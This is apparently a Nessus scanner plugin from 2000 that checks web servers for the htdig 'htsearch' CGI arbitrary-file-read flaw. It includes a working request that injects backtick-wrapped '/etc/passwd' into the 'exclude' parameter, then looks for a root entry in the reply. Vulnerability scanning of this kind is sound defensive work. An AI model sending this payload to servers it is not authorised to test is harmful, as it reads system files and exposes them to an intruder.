home *** CD-ROM | disk | FTP | other *** search
- #
- # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
- #
- # See the Nessus Scripts License for details
- #
-
- if(description)
- {
- script_id(10105);
- script_bugtraq_id(1026, 867);
- script_version ("$Revision: 1.21 $");
- script_cve_id("CVE-1999-0978", "CVE-2000-0208");
- name["english"] = "htdig";
- name["francais"] = "htdig";
- script_name(english:name["english"], francais:name["francais"]);
-
- desc["english"] = "The 'htsearch' CGI,
- which is part of the htdig package, allows
- a malicious user to view any file on the target
- computer.
-
- Solution : Upgrade to a newer version (3.1.5 or newer)
- available at http://www.htdig.org
- Risk factor : High
- ";
-
- desc["francais"] = "Le CGI 'htsearch', qui
- appartient au package htDig, permet α un
- pirate de lire n'importe quel fichier sur la machine cible.>
-
- Facteur de risque : ElevΘ
- Solution : Mettez α jour htdig en 3.1.5 ou plus rΘcent.
- htdig est disponible α http://www.htdig.org";
-
- script_description(english:desc["english"], francais:desc["francais"]);
-
- summary["english"] = "Checks if htdig is vulnerable";
- summary["francais"] = "DΘtermine sihtdig est vulnΘrable";
-
- script_summary(english:summary["english"], francais:summary["francais"]);
-
- script_category(ACT_GATHER_INFO);
-
-
- script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
- francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
- family["english"] = "CGI abuses";
- family["francais"] = "Abus de CGI";
- script_family(english:family["english"], francais:family["francais"]);
- script_dependencie("find_service.nes", "no404.nasl");
- script_require_ports("Services/www", 80);
- exit(0);
- }
-
- #
- # The script code starts here
- #
-
- include("http_func.inc");
- include("http_keepalive.inc");
-
-
- port = get_http_port(default:80);
-
- if(!get_port_state(port))exit(0);
-
- foreach dir (cgi_dirs())
- {
- req = string(dir, "/htsearch?exclude=%60/etc/passwd%60");
- req = http_get(item:req, port:port);
- result = http_keepalive_send_recv(port:port, data:req);
- if( result == NULL ) exit(0);
- if(egrep(pattern:".*root:.*:0:[01]:.*", string:result)){
- security_hole(port);
- exit(0);
- }
- }
-
-
-